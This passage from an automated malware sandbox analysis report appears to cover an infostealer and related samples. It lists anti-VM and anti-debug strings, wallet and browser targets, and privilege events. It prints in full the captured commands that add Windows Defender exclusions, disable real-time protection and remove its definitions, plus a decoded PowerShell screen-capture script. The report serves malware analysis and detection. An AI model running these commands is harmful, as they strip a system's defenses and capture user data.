                        Source: SecurityHealthSystray.exe, 0000004A.00000000.1680272657.00000000010B5000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: OpenEventAUnlockFileunrechableno consoleenter-fastRIPEMD-160impossible[:^alnum:][:^alpha:][:^ascii:][:^blank:][:^cntrl:][:^digit:][:^graph:][:^lower:][:^print:][:^punct:][:^space:][:^upper:][:xdigit:]rune <nil>image: NewBM????res binderres masterresumptionexp masterContent-IdMessage-IdHTTP_PROXYhttp_proxyhttp2debugcrypto/tlsParseAddr(invalid IPClassCSNETClassCHAOSAdditionalskipping: SHA256-RSASHA384-RSASHA512-RSADSA-SHA256ECDSA-SHA1base_noncePOSTALCODEavx512ifmaavx512vbmiavx512vnniavx512gfniavx512vaesavx512bf16EnumWindowsOpenProcessvboxservicecodecrackerBAROSINO-PCCOFFEE-SHOParchibaldpcARCHIBALDPCLANTECH-LLCALENMOOS-PC9yjCPsEYIMHnoK4zG7ZhOfOgJb6GqgK0OnZAp7UBVaS1xPLyvzr8sgCBvJChRPnsxnykj0egq7fzeuHUQIuwoEFUkFu0lQwgX5PryjIJKIrOMs4tgiizsLimS95.25.81.2435.199.6.1334.105.0.2780.211.0.9778.139.8.50totalav.comadaware.comThunderbirdTarget Pathcookies.txt%-70s %-70shistory.txtdescriptionCrypt32.dllLocal StateCentBrowserFiles Foundmot_de_passFatal ErrorMessageBoxW`
                        Source: program.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware
                        Source: program.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmusrvc
                        Source: program.exe, 00000008.00000003.1549428382.00000237A4819000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmware)
                        Source: eternal.exe, 00000002.00000002.3236463360.000000001BE94000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWIm%SystemRoot%\system32\mswsock.dll.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=MSIL"/>
                        Source: getmac.exe, 00000047.00000003.1687528519.000002A33CE15000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000047.00000002.1690693599.000002A33CE17000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000047.00000003.1686883329.000002A33CDE3000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000047.00000003.1687362776.000002A33CE0F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
                        Source: program.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmtoolsd
                        Source: program.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: f01vmsrvc
                        Source: SecurityHealthSystray.exe, 0000004A.00000000.1680272657.00000000010B5000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: max=scav ptr ] = (usageinit ms, fault tab= top=[...], fp:MarchApril+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930monthGreekAdlamBamumBatakBuhidDograKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilcpu%dfilesimap2imap3imapspop3shostsrouteparsesse41sse42ssse3SHA-1matchrune NRGBAtls: Earlyutf-8%s*%dtext/bad n (at ClassP-224P-256P-384P-521ECDSAx32dbgvmsrvcprl_ccx96dbgdbgclrde4dotwindbgpc-retx64dbgghidraVMwarevmwarexc64zb8VizSM373836ALIONETVM-PCgeorgeGRAFPCT00917test42XC64ZB5Y3y73serverh86LHDDdQrgcQfofoGlK3zMRPgfV1XIZZuXj8vizsmASPNETS7WjufUser01tHiF2TGjBsjbLouiseGGw8NR3W1GJT-ForceattribNumberembedssqliteChromeChedotKometaFenrirCoowonLiebaoDragonCocCocYandexsecretpaypalbanquewalletcryptoexodusatomiccomptecreditpermisnumberbackupconfigVideosinlinefieldsConfigIntentMeteorImpactPolyMCBypassSystem
                        Source: program.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: f5vmware
                        Source: program.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: fvmwareuser
                        Source: eternal.exe, 00000002.00000002.3199743103.000000000110B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: program.exe, 00000008.00000002.1939236456.00000237A4AE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllB
                        Source: program.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareservice
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 5_2_00007FF72C66A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF72C66A614
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA4220350 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,8_2_00007FFBA4220350
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 5_2_00007FF72C673480 GetProcessHeap,5_2_00007FF72C673480
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 5_2_00007FF72C66A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF72C66A614
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 5_2_00007FF72C65C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FF72C65C8A0
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 5_2_00007FF72C65D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF72C65D12C
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 5_2_00007FF72C65D30C SetUnhandledExceptionFilter,5_2_00007FF72C65D30C
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FF72C66A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00007FF72C66A614
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FF72C65C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00007FF72C65C8A0
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FF72C65D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00007FF72C65D12C
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FF72C65D30C SetUnhandledExceptionFilter,8_2_00007FF72C65D30C
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA4176058 SetUnhandledExceptionFilter,8_2_00007FFBA4176058
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA4173248 IsProcessorFeaturePresent,00007FFBBB591A90,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FFBBB591A90,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00007FFBA4173248
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA43D4390 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00007FFBA43D4390
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA66A339C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00007FFBA66A339C
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA66AE070 SetUnhandledExceptionFilter,8_2_00007FFBA66AE070
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBAA493318 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00007FFBAA493318
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBAA499038 RtlLookupFunctionEntry,SetUnhandledExceptionFilter,8_2_00007FFBAA499038
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBAA499050 SetUnhandledExceptionFilter,8_2_00007FFBAA499050
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBAA4C37E0 IsProcessorFeaturePresent,00007FFBBB591A90,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FFBBB591A90,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00007FFBAA4C37E0
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBAA4C7060 SetUnhandledExceptionFilter,8_2_00007FFBAA4C7060
                        Source: C:\Users\user\Desktop\EternalPredictor.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Adds a directory exclusion to Windows Defender
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\program.exe'"
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\program.exe'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\program.exe'"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'"Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\program.exe'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'
                        Bypasses PowerShell execution policy
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
                        Encrypted powershell cmdline option found
                        Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
                        Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
                        Modifies Windows Defender protection settings
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
